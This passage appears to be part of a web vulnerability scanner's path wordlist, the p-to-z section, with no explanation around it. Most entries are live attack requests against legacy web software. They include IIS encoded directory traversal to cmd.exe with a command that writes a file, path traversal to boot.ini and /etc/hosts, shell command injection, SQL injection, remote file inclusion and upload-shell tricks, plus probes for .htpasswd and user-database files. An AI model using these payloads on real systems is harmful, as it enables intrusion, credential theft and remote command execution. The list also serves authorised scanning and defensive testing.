pls/demo/owa_util.listprint?p_theQuery=select+*+from+sys.dba_users&p_cname=&p_nsize=
pls/demo/owa_util.show_query_columns?ctable=sys.dba_users
Poll_It_SSI_v2.0.cgi
Poll_It_v2.0.cgi
private/.dbusers.db
private/.htpasswd.NTEN
protected/.htpass-4.new
protected/.htpasswd.aknk
protected/.htpasswd.nten
protected/.htpasswd.slez
protected/dmr/.htpasswd.ass
protectit/.htpass-4.new
protectit/.htpasswd.aknk
protectit/.htpasswd.nten
protectit/.htpasswd.slez
protectit/dmr/.htpasswd.ass
pservlet.html^/pservlet.html
quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3
quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_font_file=ariali.ttf
random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
reg/conn.asp.bak
restricted/.htpass-4.new
restricted/.htpasswd.aknk
restricted/.htpasswd.nten
restricted/.htpasswd.NTEN
restricted/.htpasswd.slez
restricted/dmr/.htpasswd.ass
right.asp.bak
right.aspx.bak
right.jsp.bak
right.php.bak
ROADS/cgi-bin/search.pl?form=search.pl%00
robots.txt/admin.php
room/save_item.php?name=wollo&ref=josef&photo=../inc/conf.php&photo_type=txt
sample.jhtml.
samples/..%5c..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
scripts/..%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe
scripts/..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
scripts/..%5c..%5cwinnt/system32/cmd.exe
scripts/..%bg%9v../winnt/system32/cmd.exe
scripts/..%bg%qf../winnt/system32/cmd.exe
scripts/..%cg%qf../winnt/system32/cmd.exe
scripts/..%ch%8s../winnt/system32/cmd.exe
scripts/..%ch%pc../winnt/system32/cmd.exe
scripts/..%s0%9v../winnt/system32/cmd.exe
scripts/..%s0%qf../winnt/system32/cmd.exe
scripts/..%s1%8s../winnt/system32/cmd.exe
scripts/..%s1%pc../winnt/system32/cmd.exe
scripts/..%t0%qf../winnt/system32/cmd.exe
scripts/../../cmd.exe
scripts/../../cmd.exe?%2FC+echo+hacked!>c:/hello.bat
scripts/../../cmd.exe?%2FC+echo+'hacked!'>c:hello.bat
scripts/.dbusers.db
scripts/bbs.pl%3f+.htr
scripts/bbs.pl%3F+.htr
scripts/bbs.pl?+.htr
scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:..winntsystem32cmd.exe%20/c%20echo%20test>c:defcom.txt
scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:/../winnt/system32/cmd.exe%20/c%20echo%20test>c:/defcom.txt
scripts/ccbill/.dbusers.db
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
scripts/default.asp+.pl
scripts/default.aspx+.pl
scripts/default.jsp+.pl
scripts/default.php+.pl
scripts/dmr/.dbusers.db
scripts/epoch/.dbusers.db
scripts/epochp/.dbusers.db
scripts/mastergate/.dbusers.db
scripts/netbilling/.dbusers.db
scripts/passwd.txt+.pl
scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwd&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm
scripts/samples/search/queryhit.idq?CiRestriction=%23FILENAME%3D*.pwl&CiMaxRecordsPerPage=10&CiScope=%2F&TemplateName=queryhit&CiSort=rank%5Bd%5D&HTMLQueryForm=%2Fsamples%2Fsearch%2Fqueryhit.htm
scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;ls|
scripts/test.pl?+.htr
scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:/web.mdb&newdb=CREATE_DB&attr=
scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:web.mdb&newdb=CREATE_DB&attr=
scripts/tradecli.dll?template=..........boot.ini
scripts/tradecli.dll?template=../../../../../boot.ini
scripts/we3.3.3/webevent.pl
scripts/webcash/.dbusers.db
scripts/wwwi32.exe/[in=c:/boot.ini]
scripts/wwwjoin/.dbusers.db
search?NS-query=tst&NS-query-pat=../../../../../boot.ini
secure/.dbusers.db
secure/.htpass-4.new
secure/.htpasswd.aknk
secure/.htpasswd.nten
secure/.htpasswd.NTEN
secure/.htpasswd.slez
secure/dmr/.htpasswd.ass
sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=../../config/log.conf%00%5c&chapter=
sendphoto.php?album=..&pic=config.inc.php
sendphoto.php?album=..&pic=config.inc.php&sendto=mei@websec.org&filled=1
servlet..../o.jsp
servlet/../../o.jsp
servlet/com.endymion.sake.servlet.mail.MailServlet?
servlet/com.livesoftware.jrun.plugins.asp.asp
servlet/com.livesoftware.jrun.plugins.aspx.aspx
servlet/com.livesoftware.jrun.plugins.jsp.jsp
servlet/com.livesoftware.jrun.plugins.jsp.JSP
servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
servlet/com.livesoftware.jrun.plugins.php.php
servlet/com.livesoftware.jrun.plugins.ssi.ssifilter
servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5c/global.asa
servlet/com.unify.ewave.servletexec.uploadservlet
servlet/com.unify.ewave.servletexec.UploadServlet
servlet/jsp/../../tst.txt
servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
servlet/psft.pt8.config.ConfigServlet
servlet/psft.pt8.gateway.GatewayServlet
servlet/psft.pt8.reader.ReaderServlet
servlet/psoft.hsphere.CP
servlet/ssifilter/../../test.jsp
servlet/webacc?User.html=../../../../../../../../boot.ini%00
servlets/org.apache.cocoon.Cocoon
setup.asp.bak
setup.aspx.bak
setup.jsp.bak
setup.php.bak
shop/show_cart.inc.php
shopper.exe?display=action&template=order.log
show_cart.inc.php
shujuku/shujuku3.0.asa
shujuku/shujuku3.0.asp
shujuku/shujuku3.0.aspx
shujuku/shujuku3.0.jsp
shujuku/shujuku3.0.mdb
shujuku/shujuku3.0.php
siteserver/publishing/viewcode.asp?source=/tata.asp
squirrelspell/modules/check_me.mod.asp?sqspell_app[blah]=wall%
squirrelspell/modules/check_me.mod.aspx?sqspell_app[blah]=wall%
squirrelspell/modules/check_me.mod.jsp?sqspell_app[blah]=wall%
squirrelspell/modules/check_me.mod.php?sqspell_app[blah]=wall%
ss.cfg,ncl_items.asp
ss.cfg,ncl_items.aspx
ss.cfg,ncl_items.html
ss.cfg,ncl_items.jsp
ss.cfg,ncl_items.php
startstop.html?.cfm
stat/.dbusers.db
stats/.dbusers.db
stats/.htpass-4.new
stats/.htpasswd.aknk
stats/.htpasswd.nten
stats/.htpasswd.slez
stats/dmr/.htpasswd.ass
store/show_cart.inc.php
subscribe.pl?test@test.com
syscode.asp.bak
syscode.aspx.bak
syscode.jsp.bak
syscode.php.bak
system/FCKeditor/editor/filemanager/browser/default/browser.asp?Type=all&Connector=connectors/asp/connector.asp
system/FCKeditor/editor/filemanager/browser/default/browser.aspx?Type=all&Connector=connectors/asp/connector.aspx
system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
system/FCKeditor/editor/filemanager/browser/default/browser.jsp?Type=all&Connector=connectors/asp/connector.jsp
system/FCKeditor/editor/filemanager/browser/default/browser.php?Type=all&Connector=connectors/asp/connector.php
system/upload.asp?picName=st999.asp
TDdownload/wgxzdown3.5.rar
technote/main.cgi/oops?board=free_board&command=down_load&filename=/../../../main.cgi
technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
temp/.dbusers.db
template/index.asp/css.css
template/index.aspx/css.css
template/index.jsp/css.css
template/index.php/css.css
test.asp.bak
test.aspx.bak
test.jsp..
test.jsp.bak
test.php.bak
tmp/.dbusers.db
tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREATE_DB&attr=
topic/entete.php?subpath=http:/badurl_banniere.php
upload.asp?picName=st999.asp
upload.phpupload_other.php
uploadPic.asp?actionType=mod&picName=miao.asp
uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012
uploadPic.aspx?actionType=mod&picName=miao.aspx
uploadPic.inc.asp
uploadPic.jsp?actionType=mod&picName=miao.jsp
uploadPic.php?actionType=mod&picName=miao.php
uploads/index.html.bak
us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:/boot.ini
user.php&op=saveuser^/user.php&op=saveuser
user/conn.asp.bak
user_info.php3?user_username=''+or+admin_level=2+or+username%3d'x'+and+users.id=access.user_id;%00
usermanage.asp.bak
usermanage.aspx.bak
usermanage.jsp.bak
usermanage.php.bak
users.php?DATA=phpcode&then->/news.php3
vcafeeds/.htpasswd.NTEN
way-board/way-board.cgi?db=way-board.cgi%00
web/msgError.asp?Redirect=login.htm&Reason=thingss
web2000/oor/content_areas/authorize/.htpass-4.new
web2000/oor/content_areas/authorize/.htpasswd.aknk
web2000/oor/content_areas/authorize/.htpasswd.nten
web2000/oor/content_areas/authorize/.htpasswd.slez
web2000/oor/content_areas/authorize/dmr/.htpasswd.ass
web2000/oor/content_areas/safe/.htpass-4.new
web2000/oor/content_areas/safe/.htpasswd.aknk
web2000/oor/content_areas/safe/.htpasswd.nten
web2000/oor/content_areas/safe/.htpasswd.slez
web2000/oor/content_areas/safe/dmr/.htpasswd.ass
web800fo/.htpasswd.beg
webcash/.dbusers.db
webcash/.htpass-4.new
webcash/.htpasswd.aknk
webcash/.htpasswd.nten
webcash/.htpasswd.slez
webcash/dmr/.htpasswd.ass
WebEditor/admin_uploadfile.asp?id=14&dir=../../..
WebEditor/admin_uploadfile.aspx?id=14&dir=../../..
WebEditor/admin_uploadfile.php?id=14&dir=../../..
WEB-INF./web.xml
webmacro/org.paneris.paneris.controller.Page?db=tst&wmtemplate=ttt
winnt/win.ini%00examples/jsp/hello.jsp
work/.htpass-4.new
work/.htpasswd.aknk
work/.htpasswd.nten
work/.htpasswd.NTEN
work/.htpasswd.slez
work/dmr/.htpasswd.ass
wp/.webpass_members.
www.51marry.com
wwwjoin/.dbusers.db
wx/s.dll?d=/bootlog.txt
xsql/java/xsql/demo/adhocsql/query.xsql?xml-stylesheet=none.xml&sql=select+*+from+sys.dba_users
xxyy/.htpass-4.new
xxyy/.htpasswd.aknk
xxyy/.htpasswd.nten
xxyy/.htpasswd.slez
xxyy/dmr/.htpasswd.ass
yabbse/Sources/Packages.php?sourcedir=anotherhost_with_Packer.php
YuanMa365.com.txt
z9v8conn.asp.bak
z9v8conn.aspx.bak
z9v8conn.jsp.bak
z9v8conn.php.bak
zgong/ZonGG1.1.0.0.mdb
zgongg/ZonGG1.1.0.0.mdb
zongg/ZonGG1.1.0.0.mdb
zorum/include.php?gorumDir=anotherhost_with_group.php